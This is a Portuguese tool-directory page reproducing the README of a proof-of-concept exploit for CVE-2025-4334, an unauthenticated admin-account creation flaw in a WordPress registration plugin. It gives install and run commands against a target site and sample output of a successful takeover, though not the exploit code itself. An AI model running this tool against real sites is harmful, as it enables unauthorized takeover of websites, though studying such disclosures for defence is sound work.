Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-4334 — Proof-of-concept exploit for CVE-2025-4334, a privilege escalation vulnerability in the Simple User Registration WordPress plugin (<= 6.3), allowing unauthenticated attackers to create administrator accounts. | Kitploit
Ferramentas/GitHubGitHub/0xgh057r3c0n/cve-2025-4334
Privilege EscalationPassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHub0xgh057r3c0n/cve-2025-4334

CVE-2025-4334

Proof-of-concept exploit for CVE-2025-4334, a privilege escalation vulnerability in the Simple User Registration WordPress plugin (<= 6.3), allowing unauthenticated attackers to create administrator accounts.

Ver Repositório
4há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Logotipo do WordPress

CVE-2025-4334 - Simple User Registration <= 6.3 Escalação de Privilégio Não Autenticada

Título do Exploit: Simple User Registration <= 6.3 – Escalação de Privilégio Não Autenticada Autor: Gaurav Bhattacharjee (0xgh057r3c0n) CVE ID: CVE-2025-4334

Este exploit visa uma vulnerabilidade no plugin Simple User Registration para WordPress (<= v6.3), permitindo que atacantes não autenticados escalem privilégios e criem uma nova conta de administrador.


⚙️ Instalação

Clone o repositório e instale as dependências Python necessárias:

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2025-4334.git
cd CVE-2025-4334
pip3 install -r requirements.txt

Dependências:

  • requests
  • colorama

🚀 Uso

root@kitploit:~
python3 CVE-2025-4334.py -u <base_url> --form <form_url>

Argumentos:

  • -u / --url → URL base do WordPress (ex.: https://target.com/wordpress/)
  • --form → URL completa do formulário de registro (ex.: https://target.com/wpr/default-registration/)

Exemplo:

root@kitploit:~
python3 CVE-2025-4334.py -u https://example.com/wordpress --form https://example.com/wpr/default-registration/

📜 Exemplo de Saída

root@kitploit:~
[*] Fetching form details...
[i] Extracted Nonce   : 1a2b3c4d5e
[i] Extracted Form ID : 12
[i] Referer Path      : /wpr/default-registration/
[*] Sending exploit payload...
[i] HTTP Response Code : 200
[i] Server Response    : {"success":true,"user_id":2}

[+] Exploitation Successful
[+] Username   : 0xgh057r3c0nadmin
[+] First Name : 0xgh057r3c0nadmin
[+] Last Name  : 0xgh057r3c0nadmin
[+] Email      : [email protected]
[+] Password   : Wiz007@8876@
[+] Role       : administrator

Exploit By : Gaurav Bhattacharjee (0xgh057r3c0n)

⚠️ Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de pesquisa. O uso não autorizado contra sistemas sem permissão é ilegal. O autor não assume nenhuma responsabilidade pelo uso indevido.


📄 Licença

Este projeto está licenciado sob a Licença MIT.


Baixar ferramenta